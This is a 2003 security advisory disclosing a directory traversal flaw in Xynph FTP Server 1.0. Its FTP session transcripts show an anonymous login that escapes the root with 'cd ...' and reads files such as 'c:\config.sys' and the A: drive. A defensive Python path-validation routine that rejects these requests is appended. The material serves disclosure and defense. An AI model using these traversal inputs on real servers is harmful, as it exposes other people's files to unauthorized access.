Vulnerabilities in Xynph FTP Server 1.0

From: Zero-X www.lobnan.de Team (zero-xat_private)
Date: Sat Jan 11 2003 - 06:52:32 PST


    Vulnerabilities in Xynph FTP Server 1.0
    
    
    Xynph FTP Server allows Directory Traversal
    
    Example:
    #######################################################
    Verbindung mit zero-x.
    220 Herzlich Willkommen!
    <-Xynph FTP-Server->
    Benutzer (zero-x:(none)): anonymous
    331 Password required for anonymous.
    Kennwort: billsucks
    230 User anonymous logged in.
    Ftp> pwd
    257 "C:/Temp/" is current directory.
    Ftp> cd ..
    501 CWD failed. No permission
    Ftp> cd ...
    250 CWD command successful. "C:/Temp/.../" is current directory.
    Ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 .
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 ..
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Programme
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 command.com
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Autoexec.bat
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 config.sys
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Windows
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Cygwin
    drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Top-Secret
    226 File sent ok
    Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
    Ftp> get config.sys
    200 Port command successful.
    150 Opening data connection for config.sys.
    226 File sent ok
    Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
    Ftp>
    #######################################################
    
    
    and you can read all drives.
    
    Example:
    #######################################################
    Ftp> open zero-x
    Verbindung mit zero-x.
    220 Herzlich Willkommen!
    <-Xynph FTP-Server->
    Benutzer (zero-x:(none)): anonymous
    331 Password required for anonymous.
    Kennwort: billsucks
    230 User anonymous logged in.
    Ftp> get c:\config.sys
    200 Port command successful.
    150 Opening data connection for c:\config.sys.
    226 File sent ok
    Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
    Ftp> dir a:\
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw-   1 ftp      ftp       305113 Dec 15  2002 1.jpg
    -rw-rw-rw-   1 ftp      ftp       313497 Dec 15  2002 4.jpg
    -rw-rw-rw-   1 ftp      ftp       326046 Dec 15  2002 2.jpg
    -rw-rw-rw-   1 ftp      ftp       357910 Dec 15  2002 3.jpg
    226 File sent ok
    Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
    Ftp>
    #######################################################
    
    ~~ Zero X, member of www.lobnan.de ~~
    
    Greets to:
    
    www.lobnan.de (my Team)
    www.he-crew.de
    www.es-crew.de
    www.bhc-security.de
    www.dcw-group.net
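
A server-side path check that refuses each out-of-root request shown in the two sessions above, as an added example that is not part of the original advisory and is not Xynph's code. It assumes the server maps client paths onto an exported root (`C:\Temp` in the transcript); `resolve_in_root`, `check` and `PathRejected` are hypothetical names.

```python
import ntpath  # Windows path rules, usable on any OS

class PathRejected(Exception):
    """Client path would leave the exported FTP root."""

def resolve_in_root(root, cwd, requested):
    # root: real exported directory; cwd: client's virtual directory ("/" = root);
    # requested: argument of CWD / RETR / LIST exactly as the client sent it.
    # All names here are hypothetical, chosen for this example.
    drive, _ = ntpath.splitdrive(requested)
    if drive or ":" in requested:
        # "c:\config.sys", "a:\", UNC prefixes, "name:stream"
        raise PathRejected("drive, UNC or stream specifier")
    req = requested.replace("\\", "/")
    parts = [] if req.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in req.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathRejected("parent of root")
            parts.pop()
            continue
        # Assumption: the flaw came from filtering only the literal "..".
        # Refuse every component ending in a dot or space, which covers
        # "...", "...." and names Windows would silently trim.
        if comp.rstrip(". ") != comp:
            raise PathRejected("dot- or space-terminated component")
        parts.append(comp)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Final containment check on the normalised result.
    base = ntpath.normcase(ntpath.normpath(root)).rstrip("\\") + "\\"
    if not (ntpath.normcase(real) + "\\").startswith(base):
        raise PathRejected("outside root")
    return real

def check(root, cwd, requested):
    """Return the resolved path, or the string 'REJECTED: <reason>'."""
    try:
        return resolve_in_root(root, cwd, requested)
    except PathRejected as exc:
        return "REJECTED: %s" % exc

if __name__ == "__main__":
    # Requests taken from the two sessions in the advisory.
    for arg in ["..", "...", "config.sys", "c:\\config.sys", "a:\\"]:
        print("%-16r -> %s" % (arg, check("C:\\Temp", "/", arg)))
```
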


